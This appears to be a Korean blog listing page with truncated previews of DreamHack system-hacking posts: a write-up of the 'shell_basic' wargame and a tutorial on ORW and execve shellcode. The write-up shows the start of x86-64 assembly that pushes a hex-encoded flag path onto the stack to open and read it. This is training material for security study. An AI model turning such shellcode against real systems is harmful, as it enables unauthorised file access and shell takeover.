DreamHack: System Hacking/F Stage 4 (2) 썸네일형 리스트형 [혼자 실습] shell_basic 풀이 1 /home/shell_basic/flag_name_is_loooooong 0x676e6f6f6f6f6f6f/6c5f73695f656d61/6e5f67616c662f63/697361625f6c6c65/68732f656d6f682f(->리틀엔디안 /home/shell_basic/flag_name_is_loooooong) ############어셈블리 코드(shell.asm) BITS 64 section .text global _start _start: push 0x0 mov rax, 0x676e6f6f6f6f6f6f push rax mov rax, 0x6c5f73695f656d61 push rax mov rax, 0x6e5f67616c662f63 push rax mov rax, 0x697361625.. Exploit Tech: Shellcode Shellcode shellcode란, 익스플로잇(==상대 시스템을 공격하는 것)을 위해 제작된 어셈블리 코드 조각이다. shellcode에는 아주 다양한 종류가 있으며 이번 스테이지에서는 orw(open-read-write) shell code와 execve shell code에 대해 다뤄볼 것이다 shellcode는, 일반적으로 shell을 획득하는 것을 목적으로 사용된다. ORW(Open-Read-Write) Shellcode orw 셸코드는 파일을 열고, 읽은 뒤 화면에 출력해주는 shellcode이다. 이 게시글에서는 "/tmp/flag"를 읽는 셸코드를 작성해볼 것이다. orw shellcode를 C언어로 표현해보면 다음과 같다 이제 이 코드를 어셈블리어로 구현해보자. 1. int fd = o.. 이전 1 다음